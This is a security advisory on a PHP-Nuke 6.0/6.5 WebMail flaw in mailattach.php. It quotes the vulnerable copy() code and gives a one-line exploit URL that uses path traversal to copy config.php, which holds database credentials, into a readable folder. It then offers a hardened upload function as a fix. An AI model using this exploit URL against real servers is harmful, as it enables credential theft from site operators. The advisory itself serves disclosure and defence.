PHP-Nuke WebMail Command Execution Vulnerability (Mailattach)

Summary

PHP-Nuke, created by Francisco Burzi, is an open-source program for creating and managing news-based Web sites. A vulnerability in the WebMail module, and in all other modules with the ability to upload files, could allow a remote attacker to include malicious PHP files.

Credit:

The information has been provided by Frog Man.


Details

Vulnerable systems:
 * PHP-Nuke version 6.0
 * PHP-Nuke version 6.5

A remote attacker can send a specially crafted URL request to the mailattach.php script that specifies a malicious PHP file from a remote system as a parameter, which would allow the attacker to execute code on the vulnerable Web server, and possibly obtain a user’s database password.

Vulnerable code:
From mailattach.php file:
if (isset($userfile) AND $userfile != 'none') {
    if (ini_get(file_uploads) AND $attachments == 1) {
        $updir = 'tmp';
        // $userfile and $userfile_name are used as given, with no check that they come from an upload
        @copy($userfile, "$updir/$userfile_name");

Exploit:
http://target.server/modules/WebMail/mailattach.php?userfile=../../config.php&userfile_name=../attachments/file.txt&attachments=1
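
A hardened form of the copy step above, as an added example that is not PHP-Nuke's code or the vendor's fix: it reads the upload only from $_FILES, requires is_uploaded_file(), and never uses the client-supplied file name in the destination path. The function name store_attachment, the storage directory and the size limit are assumptions.

```php
<?php
declare(strict_types=1);

/**
 * Store an uploaded attachment (added example, hypothetical helper).
 * $files is expected to be $_FILES; $updir is assumed to be a directory
 * outside the web root. Returns the stored path, or null if rejected.
 */
function store_attachment(array $files, string $updir, int $maxBytes = 2097152): ?string
{
    // Read the upload from $_FILES only, never from a request variable
    // such as ?userfile=... in the query string.
    $f = $files['userfile'] ?? null;
    if (!is_array($f) || !isset($f['error'], $f['tmp_name'], $f['size'])) {
        return null;
    }
    // Reject multi-file arrays and any upload PHP flagged as failed.
    if (is_array($f['error']) || $f['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    // True only for a temp file PHP itself received via HTTP POST, so a
    // path like ../../config.php can no longer be passed in as the source.
    if (!is_string($f['tmp_name']) || !is_uploaded_file($f['tmp_name'])) {
        return null;
    }
    if ($f['size'] <= 0 || $f['size'] > $maxBytes) {
        return null;
    }
    // The destination directory must already exist; resolve it once.
    $dir = realpath($updir);
    if ($dir === false || !is_dir($dir)) {
        return null;
    }
    // Server-generated name: the client-supplied name (the old
    // $userfile_name) never becomes part of a path, so ../ cannot escape.
    $dest = $dir . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.att';

    return move_uploaded_file($f['tmp_name'], $dest) ? $dest : null;
}

// Usage (constructed path, an assumption):
// $stored = store_attachment($_FILES, '/var/lib/webmail/attachments');
```

The original file name can still be kept for display by storing basename() of it next to the generated name, as long as it is not used to build a path.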

Categories: UNIX